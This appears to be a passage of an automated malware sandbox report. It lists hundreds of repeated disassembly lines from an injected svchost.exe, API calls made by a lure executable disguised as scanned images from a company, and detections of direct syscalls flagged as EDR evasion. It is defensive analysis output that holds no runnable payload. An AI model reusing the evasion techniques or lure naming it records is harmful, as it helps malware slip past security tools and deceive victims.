            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D325E0 mov eax, dword ptr fs:[00000030h]2_2_02D325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C5ED mov eax, dword ptr fs:[00000030h]2_2_02D6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C5ED mov eax, dword ptr fs:[00000030h]2_2_02D6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E59C mov eax, dword ptr fs:[00000030h]2_2_02D6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D32582 mov eax, dword ptr fs:[00000030h]2_2_02D32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D32582 mov ecx, dword ptr fs:[00000030h]2_2_02D32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D64588 mov eax, dword ptr fs:[00000030h]2_2_02D64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D545B1 mov eax, dword ptr fs:[00000030h]2_2_02D545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D545B1 mov eax, dword ptr fs:[00000030h]2_2_02D545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB05A7 mov eax, dword ptr fs:[00000030h]2_2_02DB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB05A7 mov eax, dword ptr fs:[00000030h]2_2_02DB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB05A7 mov eax, dword ptr fs:[00000030h]2_2_02DB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D38550 mov eax, dword ptr fs:[00000030h]2_2_02D38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D38550 mov eax, dword ptr fs:[00000030h]2_2_02D38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6656A mov eax, dword ptr fs:[00000030h]2_2_02D6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6656A mov eax, dword ptr fs:[00000030h]2_2_02D6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6656A mov eax, dword ptr fs:[00000030h]2_2_02D6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC6500 mov eax, dword ptr fs:[00000030h]2_2_02DC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04500 mov eax, dword ptr fs:[00000030h]2_2_02E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04500 mov eax, dword ptr fs:[00000030h]2_2_02E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04500 mov eax, dword ptr fs:[00000030h]2_2_02E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04500 mov eax, dword ptr fs:[00000030h]2_2_02E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04500 mov eax, dword ptr fs:[00000030h]2_2_02E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04500 mov eax, dword ptr fs:[00000030h]2_2_02E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04500 mov eax, dword ptr fs:[00000030h]2_2_02E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40535 mov eax, dword ptr fs:[00000030h]2_2_02D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40535 mov eax, dword ptr fs:[00000030h]2_2_02D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40535 mov eax, dword ptr fs:[00000030h]2_2_02D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40535 mov eax, dword ptr fs:[00000030h]2_2_02D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40535 mov eax, dword ptr fs:[00000030h]2_2_02D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40535 mov eax, dword ptr fs:[00000030h]2_2_02D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E53E mov eax, dword ptr fs:[00000030h]2_2_02D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E53E mov eax, dword ptr fs:[00000030h]2_2_02D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E53E mov eax, dword ptr fs:[00000030h]2_2_02D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E53E mov eax, dword ptr fs:[00000030h]2_2_02D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E53E mov eax, dword ptr fs:[00000030h]2_2_02D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D30AD0 mov eax, dword ptr fs:[00000030h]2_2_02D30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D64AD0 mov eax, dword ptr fs:[00000030h]2_2_02D64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D64AD0 mov eax, dword ptr fs:[00000030h]2_2_02D64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D86ACC mov eax, dword ptr fs:[00000030h]2_2_02D86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D86ACC mov eax, dword ptr fs:[00000030h]2_2_02D86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D86ACC mov eax, dword ptr fs:[00000030h]2_2_02D86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6AAEE mov eax, dword ptr fs:[00000030h]2_2_02D6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6AAEE mov eax, dword ptr fs:[00000030h]2_2_02D6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D68A90 mov edx, dword ptr fs:[00000030h]2_2_02D68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04A80 mov eax, dword ptr fs:[00000030h]2_2_02E04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D38AA0 mov eax, dword ptr fs:[00000030h]2_2_02D38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D38AA0 mov eax, dword ptr fs:[00000030h]2_2_02D38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D86AA4 mov eax, dword ptr fs:[00000030h]2_2_02D86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36A50 mov eax, dword ptr fs:[00000030h]2_2_02D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36A50 mov eax, dword ptr fs:[00000030h]2_2_02D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36A50 mov eax, dword ptr fs:[00000030h]2_2_02D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36A50 mov eax, dword ptr fs:[00000030h]2_2_02D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36A50 mov eax, dword ptr fs:[00000030h]2_2_02D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36A50 mov eax, dword ptr fs:[00000030h]2_2_02D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36A50 mov eax, dword ptr fs:[00000030h]2_2_02D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40A5B mov eax, dword ptr fs:[00000030h]2_2_02D40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40A5B mov eax, dword ptr fs:[00000030h]2_2_02D40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DACA72 mov eax, dword ptr fs:[00000030h]2_2_02DACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DACA72 mov eax, dword ptr fs:[00000030h]2_2_02DACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6CA6F mov eax, dword ptr fs:[00000030h]2_2_02D6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6CA6F mov eax, dword ptr fs:[00000030h]2_2_02D6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6CA6F mov eax, dword ptr fs:[00000030h]2_2_02D6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDEA60 mov eax, dword ptr fs:[00000030h]2_2_02DDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBCA11 mov eax, dword ptr fs:[00000030h]2_2_02DBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D54A35 mov eax, dword ptr fs:[00000030h]2_2_02D54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D54A35 mov eax, dword ptr fs:[00000030h]2_2_02D54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6CA38 mov eax, dword ptr fs:[00000030h]2_2_02D6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6CA24 mov eax, dword ptr fs:[00000030h]2_2_02D6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5EA2E mov eax, dword ptr fs:[00000030h]2_2_02D5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDEBD0 mov eax, dword ptr fs:[00000030h]2_2_02DDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D50BCB mov eax, dword ptr fs:[00000030h]2_2_02D50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D50BCB mov eax, dword ptr fs:[00000030h]2_2_02D50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D50BCB mov eax, dword ptr fs:[00000030h]2_2_02D50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D30BCD mov eax, dword ptr fs:[00000030h]2_2_02D30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D30BCD mov eax, dword ptr fs:[00000030h]2_2_02D30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D30BCD mov eax, dword ptr fs:[00000030h]2_2_02D30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D38BF0 mov eax, dword ptr fs:[00000030h]2_2_02D38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D38BF0 mov eax, dword ptr fs:[00000030h]2_2_02D38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D38BF0 mov eax, dword ptr fs:[00000030h]2_2_02D38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5EBFC mov eax, dword ptr fs:[00000030h]2_2_02D5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBCBF0 mov eax, dword ptr fs:[00000030h]2_2_02DBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40BBE mov eax, dword ptr fs:[00000030h]2_2_02D40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40BBE mov eax, dword ptr fs:[00000030h]2_2_02D40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE4BB0 mov eax, dword ptr fs:[00000030h]2_2_02DE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE4BB0 mov eax, dword ptr fs:[00000030h]2_2_02DE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D28B50 mov eax, dword ptr fs:[00000030h]2_2_02D28B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDEB50 mov eax, dword ptr fs:[00000030h]2_2_02DDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE4B4B mov eax, dword ptr fs:[00000030h]2_2_02DE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE4B4B mov eax, dword ptr fs:[00000030h]2_2_02DE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC6B40 mov eax, dword ptr fs:[00000030h]2_2_02DC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC6B40 mov eax, dword ptr fs:[00000030h]2_2_02DC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFAB40 mov eax, dword ptr fs:[00000030h]2_2_02DFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD8B42 mov eax, dword ptr fs:[00000030h]2_2_02DD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2CB7E mov eax, dword ptr fs:[00000030h]2_2_02D2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E02B57 mov eax, dword ptr fs:[00000030h]2_2_02E02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E02B57 mov eax, dword ptr fs:[00000030h]2_2_02E02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E02B57 mov eax, dword ptr fs:[00000030h]2_2_02E02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E02B57 mov eax, dword ptr fs:[00000030h]2_2_02E02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]2_2_02DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]2_2_02DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]2_2_02DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]2_2_02DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]2_2_02DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]2_2_02DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]2_2_02DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]2_2_02DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]2_2_02DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04B00 mov eax, dword ptr fs:[00000030h]2_2_02E04B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5EB20 mov eax, dword ptr fs:[00000030h]2_2_02D5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5EB20 mov eax, dword ptr fs:[00000030h]2_2_02D5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF8B28 mov eax, dword ptr fs:[00000030h]2_2_02DF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF8B28 mov eax, dword ptr fs:[00000030h]2_2_02DF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E8C0 mov eax, dword ptr fs:[00000030h]2_2_02D5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E008C0 mov eax, dword ptr fs:[00000030h]2_2_02E008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C8F9 mov eax, dword ptr fs:[00000030h]2_2_02D6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C8F9 mov eax, dword ptr fs:[00000030h]2_2_02D6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFA8E4 mov eax, dword ptr fs:[00000030h]2_2_02DFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBC89D mov eax, dword ptr fs:[00000030h]2_2_02DBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D30887 mov eax, dword ptr fs:[00000030h]2_2_02D30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D60854 mov eax, dword ptr fs:[00000030h]2_2_02D60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D34859 mov eax, dword ptr fs:[00000030h]2_2_02D34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D34859 mov eax, dword ptr fs:[00000030h]2_2_02D34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D42840 mov ecx, dword ptr fs:[00000030h]2_2_02D42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBE872 mov eax, dword ptr fs:[00000030h]2_2_02DBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBE872 mov eax, dword ptr fs:[00000030h]2_2_02DBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC6870 mov eax, dword ptr fs:[00000030h]2_2_02DC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC6870 mov eax, dword ptr fs:[00000030h]2_2_02DC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBC810 mov eax, dword ptr fs:[00000030h]2_2_02DBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D52835 mov eax, dword ptr fs:[00000030h]2_2_02D52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D52835 mov eax, dword ptr fs:[00000030h]2_2_02D52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D52835 mov eax, dword ptr fs:[00000030h]2_2_02D52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D52835 mov ecx, dword ptr fs:[00000030h]2_2_02D52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D52835 mov eax, dword ptr fs:[00000030h]2_2_02D52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D52835 mov eax, dword ptr fs:[00000030h]2_2_02D52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A830 mov eax, dword ptr fs:[00000030h]2_2_02D6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD483A mov eax, dword ptr fs:[00000030h]2_2_02DD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD483A mov eax, dword ptr fs:[00000030h]2_2_02DD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D649D0 mov eax, dword ptr fs:[00000030h]2_2_02D649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFA9D3 mov eax, dword ptr fs:[00000030h]2_2_02DFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC69C0 mov eax, dword ptr fs:[00000030h]2_2_02DC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D629F9 mov eax, dword ptr fs:[00000030h]2_2_02D629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D629F9 mov eax, dword ptr fs:[00000030h]2_2_02D629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBE9E0 mov eax, dword ptr fs:[00000030h]2_2_02DBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB89B3 mov esi, dword ptr fs:[00000030h]2_2_02DB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB89B3 mov eax, dword ptr fs:[00000030h]2_2_02DB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB89B3 mov eax, dword ptr fs:[00000030h]2_2_02DB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]2_2_02D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]2_2_02D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]2_2_02D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]2_2_02D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]2_2_02D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]2_2_02D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]2_2_02D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]2_2_02D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]2_2_02D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]2_2_02D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]2_2_02D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]2_2_02D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]2_2_02D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D309AD mov eax, dword ptr fs:[00000030h]2_2_02D309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D309AD mov eax, dword ptr fs:[00000030h]2_2_02D309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB0946 mov eax, dword ptr fs:[00000030h]2_2_02DB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04940 mov eax, dword ptr fs:[00000030h]2_2_02E04940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD4978 mov eax, dword ptr fs:[00000030h]2_2_02DD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD4978 mov eax, dword ptr fs:[00000030h]2_2_02DD4978
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A781F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00A781F7
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A4A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A4A395
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A4A364 SetUnhandledExceptionFilter,0_2_00A4A364

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtTerminateThread: Direct from: 0x77542FCCJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtAllocateVirtualMemory: Direct from: 0x77542BECJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
